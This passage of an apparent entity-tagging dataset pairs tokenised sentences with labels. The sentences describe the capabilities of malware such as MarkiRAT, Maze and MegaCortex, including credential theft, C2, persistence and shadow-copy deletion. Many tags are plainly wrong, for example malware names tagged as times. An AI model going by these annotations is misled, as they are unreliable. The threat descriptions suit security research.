"ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "collect", "the", "contents", "of", "the", "`%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User", "Data\\LocalState`", "file." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "delete", "Windows", "Event", "logs", "by", "invoking", "the", "`OpenEventLogW`", "and", "`ClearEventLogW`", "functions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "collect", "files", "and", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "search", "for", "debugging", "tools", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "decrypt", "files", "and", "data." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Mafalda", "has", "been", "obfuscated", "and", "contains", "encrypted", "functions." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "send", "network", "system", "data", "and", "files", "to", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "establish", "an", "SSH", "connection", "from", "a", "compromised", "host", "to", "a", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "search", "for", "files", "and", "directories." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "download", "additional", "files", "onto", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "conduct", "mouse", "event", "logging." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "create", "a", "named", "pipe", "to", "listen", "for", "and", "send", "data", "to", "a", "named", "pipe-based", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "dump", "password", "hashes", "from", "`LSASS.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "place", "retrieved", "files", "into", "a", "destination", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "create", "a", "token", "for", "a", "different", "user." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "manipulate", "the", "system", "registry", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "use", "a", "variety", "of", "API", "calls." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "use", "raw", "TCP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "use", "port-knocking", "to", "authenticate", "itself", "to", "another", "implant", "called", "Cryshell", "to", "establish", "an", "indirect", "connection", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "execute", "PowerShell", "commands", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "collect", "a", "Chrome", "encryption", "key", "used", "to", "protect", "browser", "cookies." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "enumerate", "running", "processes", "on", "a", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "enumerate", "Registry", "keys", "with", "all", "subkeys", "and", "values." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "take", "a", "screenshot", "of", "the", "target", "machine", "and", "save", "it", "to", "a", "file." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "search", "for", "a", "variety", "of", "security", "software", "programs,", "EDR", "systems,", "and", "malware", "analysis", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "B-Tool" ] }, { "tokens": [ "Mafalda", "can", "create", "a", "remote", "service,", "let", "it", "run", "once,", "and", "then", "delete", "it." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "encode", "data", "using", "Base64", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "encrypt", "its", "C2", "traffic", "with", "RC4." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "collect", "the", "computer", "name", "and", "enumerate", "all", "drives", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "use", "the", "`GetAdaptersInfo`", "function", "to", "retrieve", "information", "about", "network", "adapters", "and", "the", "`GetIpNetTable`", "function", "to", "retrieve", "the", "IPv4", "to", "physical", "network", "address", "mapping", "table." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "use", "the", "<code>GetExtendedTcpTable</code>", "function", "to", "retrieve", "information", "about", "established", "TCP", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "collect", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "use", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Mafalda", "can", "execute", "shell", "commands", "using", "`cmd.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "MailSniper", "can", "be", "used", "to", "obtain", "account", "names", "from", "Exchange", "and", "Office", "365", "using", "the", "<code>Get-GlobalAddressList</code>", "cmdlet." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "MailSniper", "can", "be", "used", "for", "password", "spraying", "against", "Exchange", "and", "Office", "365." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MailSniper", "can", "be", "used", "for", "searching", "through", "email", "in", "Exchange", "and", "Office", "365", "environments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "use", "BITS", "Utility", "to", "connect", "with", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "capture", "clipboard", "content." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "MarkiRAT", "can", "upload", "data", "from", "the", "victim's", "machine", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "exfiltrate", "locally", "stored", "data", "via", "its", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "look", "for", "files", "carrying", "specific", "extensions", "such", "as:", ".rtf,", ".doc,", ".docx,", ".xls,", ".xlsx,", ".ppt,", ".pptx,", ".pps,", ".ppsx,", ".txt,", ".gpg,", ".pkr,", ".kdbx,", ".key,", "and", ".jpb." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "MarkiRAT", "can", "download", "additional", "files", "and", "tools", "from", "its", "C2", "server,", "including", "through", "the", "use", "of", "BITSAdmin." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "MarkiRAT", "can", "capture", "all", "keystrokes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "store", "collected", "data", "locally", "in", "a", "created", ".nfo", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "MarkiRAT", "can", "masquerade", "as", "<code>update.exe</code>", "and", "<code>svehost.exe</code>;", "it", "has", "also", "mimicked", "legitimate", "Telegram", "and", "Chrome", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "run", "the", "ShellExecuteW", "API", "via", "the", "Windows", "Command", "Shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "gather", "information", "from", "the", "Keepass", "password", "manager." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "search", "for", "different", "processes", "on", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "drop", "its", "payload", "into", "the", "Startup", "directory", "to", "ensure", "it", "automatically", "runs", "when", "the", "compromised", "system", "is", "started." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "capture", "screenshots", "that", "are", "initially", "saved", "as", "‘scr.jpg’." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "check", "for", "running", "processes", "on", "the", "victim’s", "machine", "to", "look", "for", "Kaspersky", "and", "Bitdefender", "antivirus", "products." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "modify", "the", "shortcut", "that", "launches", "Telegram", "by", "replacing", "its", "path", "with", "the", "malicious", "payload", "to", "launch", "with", "the", "legitimate", "executable." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "check", "for", "the", "Telegram", "installation", "directory", "by", "enumerating", "the", "files", "on", "disk." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "obtain", "the", "computer", "name", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "use", "the", "<code>GetKeyboardLayout</code>", "API", "to", "check", "if", "a", "compromised", "host's", "keyboard", "is", "set", "to", "Persian." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "retrieve", "the", "victim’s", "username." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "initiate", "communication", "over", "HTTP/HTTPS", "for", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MarkiRAT", "can", "utilize", "cmd.exe", "to", "execute", "commands", "in", "a", "victim's", "environment." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Matryoshka", "is", "capable", "of", "providing", "Meterpreter", "shell", "access." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "B-Org", "B-OffAct", "O" ] }, { "tokens": [ "Matryoshka", "is", "capable", "of", "stealing", "Outlook", "passwords." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Purp", "B-Purp", "B-Purp" ] }, { "tokens": [ "Matryoshka", "uses", "DNS", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Matryoshka", "uses", "reflective", "DLL", "injection", "to", "inject", "the", "malicious", "library", "and", "execute", "the", "RAT." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Matryoshka", "is", "capable", "of", "keylogging." ], "ner_tags": [ "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Matryoshka", "obfuscates", "API", "function", "names", "using", "a", "substitute", "cipher", "combined", "with", "Base64", "encoding." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Matryoshka", "can", "establish", "persistence", "by", "adding", "Registry", "Run", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Matryoshka", "uses", "rundll32.exe", "in", "a", "Registry", "Run", "key", "value", "for", "execution", "as", "part", "of", "its", "persistence", "mechanism." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Matryoshka", "can", "establish", "persistence", "by", "adding", "a", "Scheduled", "Task", "named", "\"Microsoft", "Boost", "Kernel", "Optimization\"." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "B-SamFile", "O" ] }, { "tokens": [ "Matryoshka", "is", "capable", "of", "performing", "screen", "captures." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "inserted", "large", "blocks", "of", "junk", "code,", "including", "some", "components", "to", "decrypt", "strings", "and", "other", "important", "information", "for", "later", "in", "the", "encryption", "process." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "disrupted", "systems", "by", "encrypting", "files", "on", "targeted", "machines,", "claiming", "to", "decrypt", "files", "if", "a", "ransom", "payment", "is", "made.", "Maze", "has", "used", "the", "ChaCha", "algorithm,", "based", "on", "Salsa20,", "and", "an", "RSA", "algorithm", "to", "encrypt", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "disabled", "dynamic", "analysis", "and", "other", "security", "tools", "including", "IDA", "debugger,", "x32dbg,", "and", "OllyDbg.", "It", "has", "also", "disabled", "Windows", "Defender's", "Real-Time", "Monitoring", "feature", "and", "attempted", "to", "disable", "endpoint", "protection", "services." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "B-Way", "O", "O", "O", "O", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "forged", "POST", "strings", "with", "a", "random", "choice", "from", "a", "list", "of", "possibilities", "including", "\"forum\",", "\"php\",", "\"view\",", "etc.", "while", "making", "connection", "with", "the", "C2,", "hindering", "detection", "efforts." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "injected", "the", "malware", "DLL", "into", "a", "target", "process." ], "ner_tags": [ "B-Time", "O", "I-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "used", "the", "“Wow64RevertWow64FsRedirection”", "function", "following", "attempts", "to", "delete", "the", "shadow", "volumes,", "in", "order", "to", "leave", "the", "system", "in", "the", "same", "state", "as", "it", "was", "prior", "to", "redirection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "attempted", "to", "delete", "the", "shadow", "volumes", "of", "infected", "machines,", "once", "before", "and", "once", "after", "the", "encryption", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "operators", "have", "created", "scheduled", "tasks", "masquerading", "as", "\"Windows", "Update", "Security\",", "\"Windows", "Update", "Security", "Patches\",", "and", "\"Google", "Chrome", "Security", "Update\"", "designed", "to", "launch", "the", "ransomware." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "delivered", "components", "for", "its", "ransomware", "attacks", "using", "MSI", "files,", "some", "of", "which", "have", "been", "executed", "from", "the", "command-line", "using", "<code>msiexec</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "used", "several", "Windows", "API", "functions", "throughout", "the", "encryption", "process", "including", "IsDebuggerPresent,", "TerminateProcess,", "Process32FirstW,", "among", "others." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "Maze", "has", "decrypted", "strings", "and", "other", "important", "information", "during", "the", "encryption", "process.", "Maze", "also", "calls", "certain", "functions", "dynamically", "to", "hinder", "analysis." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "gathered", "all", "of", "the", "running", "system", "processes." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "created", "a", "file", "named", "\"startup_vrun.bat\"", "in", "the", "Startup", "folder", "of", "a", "virtual", "machine", "to", "establish", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "operators", "have", "used", "VirtualBox", "and", "a", "Windows", "7", "virtual", "machine", "to", "run", "the", "ransomware;", "the", "virtual", "machine's", "configuration", "file", "mapped", "the", "shared", "network", "drives", "of", "the", "target", "company,", "presumably", "so", "Maze", "can", "encrypt", "files", "on", "the", "shared", "drives", "as", "well", "as", "the", "local", "machine." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "created", "scheduled", "tasks", "using", "name", "variants", "such", "as", "\"Windows", "Update", "Security\",", "\"Windows", "Update", "Security", "Patches\",", "and", "\"Google", "Chrome", "Security", "Update\",", "to", "launch", "Maze", "at", "a", "specific", "time." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "stopped", "SQL", "services", "to", "ensure", "it", "can", "encrypt", "any", "database." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "checked", "the", "language", "of", "the", "infected", "system", "using", "the", "\"GetUSerDefaultUILanguage\"", "function." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Maze", "has", "checked", "the", "language", "of", "the", "machine", "with", "function", "<code>GetUserDefaultUILanguage</code>", "and", "terminated", "execution", "if", "the", "language", "matches", "with", "an", "entry", "in", "the", "predefined", "list." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "used", "the", "\"WNetOpenEnumW\",", "\"WNetEnumResourceW”,", "“WNetCloseEnum”", "and", "“WNetAddConnection2W”", "functions", "to", "enumerate", "the", "network", "resources", "on", "the", "infected", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "issued", "a", "shutdown", "command", "on", "a", "victim", "machine", "that,", "upon", "reboot,", "will", "run", "the", "ransomware", "within", "a", "VM." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "communicated", "to", "hard-coded", "IP", "addresses", "via", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "Maze", "encryption", "process", "has", "used", "batch", "scripts", "with", "various", "commands." ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Maze", "has", "used", "WMI", "to", "attempt", "to", "delete", "the", "shadow", "volumes", "on", "a", "machine,", "and", "to", "connect", "a", "virtual", "machine", "to", "the", "network", "domain", "of", "the", "victim", "organization's", "network." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MechaFlounder", "has", "the", "ability", "to", "send", "the", "compromised", "user's", "account", "name", "and", "hostname", "within", "a", "URL", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MechaFlounder", "has", "the", "ability", "to", "upload", "and", "download", "files", "to", "and", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MechaFlounder", "has", "been", "downloaded", "as", "a", "file", "named", "lsass.exe,", "which", "matches", "the", "legitimate", "Windows", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MechaFlounder", "uses", "a", "python-based", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "MechaFlounder", "has", "the", "ability", "to", "use", "base16", "encoded", "strings", "in", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MechaFlounder", "has", "the", "ability", "to", "identify", "the", "username", "and", "hostname", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MechaFlounder", "has", "the", "ability", "to", "use", "HTTP", "in", "communication", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "MechaFlounder", "has", "the", "ability", "to", "run", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "can", "enable", "<code>SeDebugPrivilege</code>", "and", "adjust", "token", "privileges." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "MegaCortex", "has", "changed", "user", "account", "passwords", "and", "logged", "users", "off", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "has", "used", "code", "signing", "certificates", "issued", "to", "fake", "companies", "to", "bypass", "security", "controls." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Org", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "has", "used", "the", "open-source", "library,", "Mbed", "Crypto,", "and", "generated", "AES", "keys", "to", "carry", "out", "the", "file", "encryption", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Tool", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "has", "used", "a", "Base64", "key", "to", "decode", "its", "components." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "was", "used", "to", "kill", "endpoint", "security", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg", "I-Features", "O" ] }, { "tokens": [ "MegaCortex", "can", "wipe", "deleted", "data", "from", "all", "drives", "using", "<code>cipher.exe</code>." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "MegaCortex", "loads", "<code>injecthelper.dll</code>", "into", "a", "newly", "created", "<code>rundll32.exe</code>", "process." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "MegaCortex", "can", "parse", "the", "available", "drives", "and", "directories", "to", "determine", "which", "files", "to", "encrypt." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "has", "deleted", "volume", "shadow", "copies", "using", "<code>vssadmin.exe</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "MegaCortex", "has", "added", "entries", "to", "the", "Registry", "for", "ransom", "contact", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "escalating", "privileges,", "MegaCortex", "calls", "<code>TerminateProcess()</code>,", "<code>CreateRemoteThread</code>,", "and", "other", "Win32", "APIs." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MegaCortex", "has", "used", "<code>rundll32.exe</code>", "to", "load", 